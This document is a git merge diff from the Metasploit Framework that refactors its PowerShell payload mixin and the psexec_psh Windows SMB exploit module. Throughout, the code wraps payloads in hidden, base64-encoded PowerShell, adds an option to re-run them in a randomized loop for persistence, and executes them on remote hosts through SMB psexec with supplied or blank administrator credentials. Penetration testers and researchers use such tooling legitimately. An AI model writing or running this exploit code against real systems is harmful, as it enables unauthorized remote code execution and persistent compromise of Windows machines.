Merge branch 'powershell_import' of github.com:sempervictus/metasploit-framework into powershell_import_post

Author: RageLtMan

lib/msf/core/exploit/powershell.rb

@@ -11,7 +11,9 @@ def initialize(info = {})
     super
     register_advanced_options(
       [
-        OptBool.new('RUN_WOW64', [
+				OptBool.new('PSH::PERSIST', [true, 'Run the payload in a loop', false]),
+				OptBool.new('PSH::OLD_METHOD', [true, 'Use powershell 1.0', false]),
+        OptBool.new('PSH::RUN_WOW64', [
           false,
           'Execute powershell in 32bit compatibility mode, payloads need native arch',
           false
@@ -98,22 +100,22 @@ def run_hidden_psh(ps_code,ps_bin='powershell.exe')
   #
   # Creates cmd script to execute psh payload
   #
-  def cmd_psh_payload(pay, old_psh=false)
+	def cmd_psh_payload(pay, old_psh=datastore['PSH::OLD_METHOD'], wow64=datastore['PSH::RUN_WOW64'])
     # Allow powershell 1.0 format
     if old_psh
       psh_payload = Msf::Util::EXE.to_win32pe_psh(framework, pay)
     else
       psh_payload = Msf::Util::EXE.to_win32pe_psh_net(framework, pay)
     end
     # Run our payload in a while loop
-    if datastore['PERSIST']
+    if datastore['PSH::PERSIST']
       fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
       sleep_time = rand(5)+5
       psh_payload  = "function #{fun_name}{#{psh_payload}};"
       psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};"
     end
     # Determine appropriate architecture, manual method reduces script size
-    ps_bin = datastore['RUN_WOW64'] ? '$env:windir\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
+		ps_bin = wow64 ? '$env:windir\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
     # Wrap in hidden runtime
     psh_payload = run_hidden_psh(psh_payload,ps_bin)
     # Convert to base64 for -encodedcommand execution

modules/exploits/windows/smb/psexec_psh.rb

@@ -1,15 +1,21 @@
 # -*- coding: binary -*-
 
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
 require 'msf/core'
+require 'msf/core/exploit/powershell'
 
 class Metasploit3 < Msf::Exploit::Remote
-		Rank = ManualRanking
+	Rank = ManualRanking
 
 	# Exploit mixins should be called first
 	include Msf::Exploit::Remote::SMB::Psexec
 	include Msf::Exploit::Powershell
-	include Msf::Auxiliary::Report
-	include Msf::Exploit::EXE
 
 	def initialize(info = {})
 		super(update_info(info,
@@ -29,7 +35,8 @@ def initialize(info = {})
 			},
 
 			'Author'         => [
-				'RageLtMan <rageltman[at]sempervictus'
+				'Royce @R3dy__ Davis <rdavis[at]accuvant.com>', # PSExec command module
+				'RageLtMan <rageltman[at]sempervictus' # PSH exploit, libs, encoders
 			],
 
 			'License'        => MSF_LICENSE,
@@ -48,9 +55,11 @@ def initialize(info = {})
 			'Platform'       => 'win',
 			'Targets'        =>
 				[
-					[ 'Automatic', { } ],
+					[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+					[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
 				],
 			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Jan 01 1999',
 			'References'     => [
 				[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
 				[ 'OSVDB', '3106'],
@@ -61,43 +70,45 @@ def initialize(info = {})
 		))
 
 		register_options([
-			OptBool.new('PERSIST', [false, 'Run the payload in a loop']),
-			OptBool.new('PSH_OLD_METHOD', [false, 'Use powershell 1.0', false]),
 			OptBool.new('DryRun',[false,'dry run',false]),
 		], self.class)
 	end
 
 
 	def exploit
-		command = cmd_psh_payload(payload.encoded,datastore['PSH_OLD_METHOD'])
+		command = cmd_psh_payload(payload.encoded)
 		if datastore['DryRun']
 			print_good command
 			return
 		end
 
-		#Try and authenticate with given credentials
+		if datastore['PSH::RUN_WOW64'] and target_arch.first == "x86_64"
+			fail_with(Exploit::Failure::BadConfig, "Select an x86 target and payload with RUN_WOW64 enabled")
+		end
+
+		# Try and authenticate with given credentials
 		if connect
 			begin
 				smb_login
 			rescue StandardError => autherror
-				print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}")
-				return
+				fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to authenticate with given credentials: #{autherror}")
+      ensure
+        disconnect
 			end
 			# Execute the powershell command
+			print_status("#{peer} - Executing the payload...")
 			begin
-				print_status("#{peer} - Executing the payload...")
-				#vprint_good(command)
 				return psexec(command)
 			rescue StandardError => exec_command_error
-				print_error("#{peer} - Unable to execute specified command: #{exec_command_error}")
-				return false
-			end
-			disconnect
+				fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
+      ensure
+        disconnect
+      end
 		end
 	end
 
 	def peer
 		return "#{rhost}:#{rport}"
 	end
-
 end
+